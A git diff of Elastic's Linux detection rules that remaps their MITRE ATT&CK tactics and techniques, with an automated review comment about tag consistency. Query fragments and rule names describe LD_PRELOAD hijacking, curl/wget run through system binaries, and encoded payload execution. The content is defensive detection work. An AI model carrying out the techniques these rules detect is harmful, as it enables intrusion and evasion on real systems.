diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
index 05fae4d0549..2f28952308b 100644
--- a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
+++ b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/11/24"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -144,46 +144,56 @@ sequence with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1202"
+name = "Indirect Command Execution"
+reference = "https://attack.mitre.org/techniques/T1202/"
- [[rule.threat.technique]]
- id = "T1218"
- name = "System Binary Proxy Execution"
- reference = "https://attack.mitre.org/techniques/T1218/"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- id = "TA0011"
- name = "Command and Control"
- reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- id = "TA0010"
- name = "Exfiltration"
- reference = "https://attack.mitre.org/tactics/TA0010/"
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/linux/defense_evasion_directory_creation_in_bin.toml b/rules/linux/defense_evasion_directory_creation_in_bin.toml
index 450965c1864..e1b62a2cde4 100644
--- a/rules/linux/defense_evasion_directory_creation_in_bin.toml
+++ b/rules/linux/defense_evasion_directory_creation_in_bin.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/01"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -108,6 +108,16 @@ not process.parent.executable in ("/usr/bin/make", "/bin/make")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [[rule.threat.technique]]
 id = "T1564"
 name = "Hide Artifacts"
diff --git a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
index 8f0a8af6a0e..c0e2fdee593 100644
--- a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
+++ b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/28"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -112,3 +112,21 @@ reference = "https://attack.mitre.org/techniques/T1548/003/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.003"
+name = "Sudo and Sudo Caching"
+reference = "https://attack.mitre.org/techniques/T1548/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/defense_evasion_dynamic_linker_file_creation.toml b/rules/linux/defense_evasion_dynamic_linker_file_creation.toml
index 92d844476c3..7a626cecbc5 100644
--- a/rules/linux/defense_evasion_dynamic_linker_file_creation.toml
+++ b/rules/linux/defense_evasion_dynamic_linker_file_creation.toml
@@ -2,7 +2,7 @@ creation_date = "2024/08/08"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -160,3 +160,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/defense_evasion_file_deletion_via_shred.toml b/rules/linux/defense_evasion_file_deletion_via_shred.toml
index 90b9c8b3890..d879a0396bd 100644
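Review bot: The added `[[rule.threat]]` block maps this rule to a tactic it did not carry before (Privilege Escalation, TA0004), but the rule's `tags` array is outside this hunk, so it is not visible whether a matching `Tactic: Privilege Escalation` tag was added; if it was not, the tag/tactic consistency check will most likely report the rule. The same applies to every hunk in this chunk that introduces a new tactic: dynamic_linker_file_creation, unusual_preload_env_vars and potential_kubectl_impersonation (Privilege Escalation), file_deletion_via_shred, kill_command_executed, rename_esxi_files and user_or_group_deletion (Impact), interactive_shell_from_system_user and ld_preload_cmdline (Execution), potential_kubectl_masquerading (Discovery, Execution) and sus_utility_executed_via_tmux_or_screen (Command and Control, Discovery, Execution). Repeating T1548/T1548.003 here while the hunk header shows it already mapped under Defense Evasion is the expected shape when one technique is attributed to two tactics, so that part needs no change.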
--- a/rules/linux/defense_evasion_file_deletion_via_shred.toml
+++ b/rules/linux/defense_evasion_file_deletion_via_shred.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/27"
 integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -127,3 +127,15 @@ id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1485"
+name = "Data Destruction"
+reference = "https://attack.mitre.org/techniques/T1485/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml
index b838709d6db..7eed59e94d8 100644
--- a/rules/linux/defense_evasion_file_mod_writable_dir.toml
+++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -131,11 +131,15 @@ id = "T1222"
 name = "File and Directory Permissions Modification"
 reference = "https://attack.mitre.org/techniques/T1222/"
+[[rule.threat.technique.subtechnique]]
+id = "T1222.002"
+name = "Linux and Mac File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/002/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.parent.executable", "process.command_line"]
diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
index 96000cee0bf..d2550c0373f 100644
--- a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
+++ b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/29"
 integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -116,6 +116,11 @@ id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
+
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
index 62bddb86804..8d95fcc7b4d 100644
--- a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
+++ b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
@@ -2,7 +2,7 @@ creation_date = "2024/11/04"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -156,6 +156,16 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.011"
+name = "Lua"
+reference = "https://attack.mitre.org/techniques/T1059/011/"
+
 [[rule.threat.technique]]
 id = "T1204"
 name = "User Execution"
diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
index 46ad1a21591..a2affed2d17 100644
--- a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
+++ b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
@@ -2,7 +2,7 @@ creation_date = "2024/11/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -124,10 +124,15 @@ In Linux environments, system users are typically non-interactive and serve spec
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.003"
+name = "Local Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/003/"
 [[rule.threat.technique]]
 id = "T1564"
@@ -139,6 +144,28 @@ id = "T1564.002"
 name = "Hidden Users"
 reference = "https://attack.mitre.org/techniques/T1564/002/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable"]
diff --git a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
index 1ac5aa2f508..c1bb6e2a72d 100644
--- a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
+++ b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/21"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/04"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -126,45 +126,55 @@ sequence by host.id, process.parent.entity_id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
- [[rule.threat.technique]]
- name = "Obfuscated Files or Information"
- id = "T1027"
- reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
- [[rule.threat.technique]]
- name = "Deobfuscate/Decode Files or Information"
- id = "T1140"
- reference = "https://attack.mitre.org/techniques/T1140/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.011"
+name = "Lua"
+reference = "https://attack.mitre.org/techniques/T1059/011/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_kill_command_executed.toml b/rules/linux/defense_evasion_kill_command_executed.toml
index 68a5e17a6e7..225fabde9e2 100644
--- a/rules/linux/defense_evasion_kill_command_executed.toml
+++ b/rules/linux/defense_evasion_kill_command_executed.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -103,10 +103,20 @@ process.name:(kill or pkill or killall) and not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.006"
+name = "Indicator Blocking"
+reference = "https://attack.mitre.org/techniques/T1562/006/"
 [[rule.threat.technique]]
 id = "T1564"
@@ -118,24 +128,14 @@ id = "T1564.001"
 name = "Hidden Files and Directories"
 reference = "https://attack.mitre.org/techniques/T1564/001/"
-[[rule.threat.technique]]
-name = "Impair Defenses"
-id = "T1562"
-reference = "https://attack.mitre.org/techniques/T1562/"
-
-[[rule.threat.technique.subtechnique]]
-name = "Indicator Blocking"
-id = "T1562.006"
-reference = "https://attack.mitre.org/techniques/T1562/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -146,6 +146,23 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1489"
+name = "Service Stop"
+reference = "https://attack.mitre.org/techniques/T1489/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.parent.executable"]
diff --git a/rules/linux/defense_evasion_kthreadd_masquerading.toml b/rules/linux/defense_evasion_kthreadd_masquerading.toml
index 847734d3990..e002b267bf6 100644
--- a/rules/linux/defense_evasion_kthreadd_masquerading.toml
+++ b/rules/linux/defense_evasion_kthreadd_masquerading.toml
@@ -2,7 +2,7 @@ creation_date = "2024/02/01"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -116,6 +116,11 @@ id = "T1036.004"
 name = "Masquerade Task or Service"
 reference = "https://attack.mitre.org/techniques/T1036/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [[rule.threat.technique]]
 id = "T1564"
 name = "Hide Artifacts"
diff --git a/rules/linux/defense_evasion_ld_preload_cmdline.toml b/rules/linux/defense_evasion_ld_preload_cmdline.toml
index 3ac9270442c..46324c56b74 100644
--- a/rules/linux/defense_evasion_ld_preload_cmdline.toml
+++ b/rules/linux/defense_evasion_ld_preload_cmdline.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/30"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -111,57 +111,74 @@ process.args:-c and process.command_line:(*LD_LIBRARY_PATH=* or *LD_PRELOAD=*)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Persistence"
- id = "TA0003"
- reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Privilege Escalation"
- id = "TA0004"
- reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
- [[rule.threat.technique.subtechnique]]
- name = "Dynamic Linker Hijacking"
- id = "T1574.006"
- reference = "https://attack.mitre.org/techniques/T1574/006/"
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name", "process.command_line", "host.id"]
diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml
index 8559b7e0144..125a2f0289d 100644
--- a/rules/linux/defense_evasion_ld_so_creation.toml
+++ b/rules/linux/defense_evasion_ld_so_creation.toml
@@ -2,7 +2,7 @@ creation_date = "2024/12/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -124,6 +124,16 @@ id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_log_files_deleted.toml b/rules/linux/defense_evasion_log_files_deleted.toml
index f0e1caa086b..227b89f7c69 100644
--- a/rules/linux/defense_evasion_log_files_deleted.toml
+++ b/rules/linux/defense_evasion_log_files_deleted.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/03"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -133,6 +133,11 @@ id = "T1070.002"
 name = "Clear Linux or Mac System Logs"
 reference = "https://attack.mitre.org/techniques/T1070/002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1070.004"
+name = "File Deletion"
+reference = "https://attack.mitre.org/techniques/T1070/004/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_mount_execution.toml b/rules/linux/defense_evasion_mount_execution.toml
index debb67bae1a..f2f493c7d53 100644
--- a/rules/linux/defense_evasion_mount_execution.toml
+++ b/rules/linux/defense_evasion_mount_execution.toml
@@ -2,7 +2,7 @@ creation_date = "2023/04/11"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -118,6 +118,11 @@ id = "T1564"
 name = "Hide Artifacts"
 reference = "https://attack.mitre.org/techniques/T1564/"
+[[rule.threat.technique.subtechnique]]
+id = "T1564.001"
+name = "Hidden Files and Directories"
+reference = "https://attack.mitre.org/techniques/T1564/001/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
index 14c9ecdfc1d..2a9ade9c742 100644
--- a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
+++ b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml
@@ -2,7 +2,7 @@ creation_date = "2025/07/24"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -120,45 +120,50 @@ sequence by process.parent.entity_id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
- [[rule.threat.technique]]
- name = "Obfuscated Files or Information"
- id = "T1027"
- reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
- [[rule.threat.technique]]
- name = "Deobfuscate/Decode Files or Information"
- id = "T1140"
- reference = "https://attack.mitre.org/techniques/T1140/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
index 105dced6160..2b82e6a07b1 100644
--- a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
+++ b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "cloud
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
